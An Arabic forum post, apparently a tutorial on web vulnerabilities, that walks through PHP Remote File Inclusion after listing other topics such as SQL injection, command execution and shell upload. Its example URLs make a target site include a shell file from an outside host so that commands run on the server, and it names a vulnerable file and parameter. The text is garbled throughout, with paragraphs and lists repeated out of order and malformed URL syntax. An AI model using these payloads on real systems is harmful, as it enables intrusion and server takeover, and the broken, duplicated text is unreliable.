تويت
السلام عليكم
من المفترض ان اكتب هذا الموضوع في المدونة ولكن سأكتبها هنا واشير اليها بعد ذلك من المدونة .
الموضوع هو عبارة عن شرح لمجموعة من الثغرات الويب التي نقراء عنها ويتم تطبيقها او استغلالها دون المعرفة بطبيعة العمل او كيف حدثت .
الشرح يقسم الى جزئين الأول
اهم المواقع التي من الممكن من خلالها متابعة جديد الثغرات
http://www.exploit-db.com/
http://www.securityfocus.com/
http://securityreason.com/
Remot File Include
تعتبر هذا الثغرات من الثغرات البرمجية المتعلقة بلغة PHP . تسمح هذه الثغات بادراج ملفات بصيغ مختلفة (txt - php - gif - jpj ) . ويتم استخدامها في عملية ادراج كود خبيث او ما يسمى Shell .
تقوم هنا دالة GET بادراج التعريف لدالة include وبعدها ينتهي الكود . فلو قمنا باخذ كلمة rfi وتم ادراجها بعد الملف سوف يقوم الملف بادراج ملف اخر من خارج السيرفر . كمثال
ظهر لنا خطا
من المفترض ان اكتب هذا الموضوع في المدونة ولكن سأكتبها هنا واشير اليها بعد ذلك من المدونة .
الموضوع هو عبارة عن شرح لمجموعة من الثغرات الويب التي نقراء عنها ويتم تطبيقها او استغلالها دون المعرفة بطبيعة العمل او كيف حدثت .
Remote File Include
Local File Include (Remote File Disclosure)
Remote Sql Injection
Remote Command Execution
XSS (Cross Site Scripting)
Upload Shell
Dump Database
Bypass Admincp
Local File Include (Remote File Disclosure)
Remote Sql Injection
Remote Command Execution
XSS (Cross Site Scripting)
Upload Shell
Dump Database
Bypass Admincp
الشرح يقسم الى جزئين الأول
Remote File Include
Local File Include (Remote File Disclosure)
Remote Sql Injection
Remote Command Execution
Remote Sql Injection
Remote Command Execution
والجزء الثاني ان شاء الله
XSS (Cross Site Scripting)
Upload Shell
Dump Database
Bypass Admincp
Upload Shell
Dump Database
Bypass Admincp
بسم الله الرحمن الرحيم
اهم المواقع التي من الممكن من خلالها متابعة جديد الثغرات
http://www.exploit-db.com/
http://www.securityfocus.com/
http://securityreason.com/
Remot File Include
تعتبر هذا الثغرات من الثغرات البرمجية المتعلقة بلغة PHP . تسمح هذه الثغات بادراج ملفات بصيغ مختلفة (txt - php - gif - jpj ) . ويتم استخدامها في عملية ادراج كود خبيث او ما يسمى Shell .
تقوم هنا دالة GET بادراج التعريف لدالة include وبعدها ينتهي الكود . فلو قمنا باخذ كلمة rfi وتم ادراجها بعد الملف سوف يقوم الملف بادراج ملف اخر من خارج السيرفر . كمثال
كود PHP:
www.xxx.com/index.php
كود PHP:
warning main () function.include
نقوم هنا بادراج اي متغير وعلى سبيل المثال
كود PHP:
www.xxx.com/index.php?=rfi
في هذا النوع من الثغرات يبقى الخطا موجود
كود PHP:
warning main () function.include
لنجرب ان نقوم بادراج ملف من خارج السيرفر
كود PHP:
www.xxx.com/index.php?=rfi=shell.txt
سيتم جلب الملف من خارج السيرفر فهنا يتم رفع شل على مساحة ما ليكن على رابط ليتم استخدامه بمثل هذه الثغرات
كود PHP:
www.xxx.com/index.php?=rfi=http:://33.44.11/shell.txt
سيتم بذلك جلب الملف من خارج السيرفر لداخله ليتم بعد ذلك تطبيق الاوامر من خلال هذا الملف على السيرفر نفسه .
طبعا اهم الدوال الي توقع فيها هذه الثغرة
طبعا اهم الدوال الي توقع فيها هذه الثغرة
كود PHP:
include
include_once
require_once
وهية عبارة عن دوال مفتوحة ويليها متغير $
سكريبت ما يحتوي ملف باسم luk.php شاهدنا ان هنالك دالة مفتوحة ومتغير $
سكريبت ما يحتوي ملف باسم luk.php شاهدنا ان هنالك دالة مفتوحة ومتغير $
كود PHP:
include($g_include."str0k.php"); Hah
نلاحظ ان دالة include تبعها متغير $
الملف المصاب luk.php
والدالة المصابة g_include
وبيكون التطبيق على هذا النحو
الملف المصاب luk.php
والدالة المصابة g_include
وبيكون التطبيق على هذا النحو
كود PHP:
www.xxx.com/index.php/include/luk.php?g_include=http:://33.44.11/shell.txt
تعليق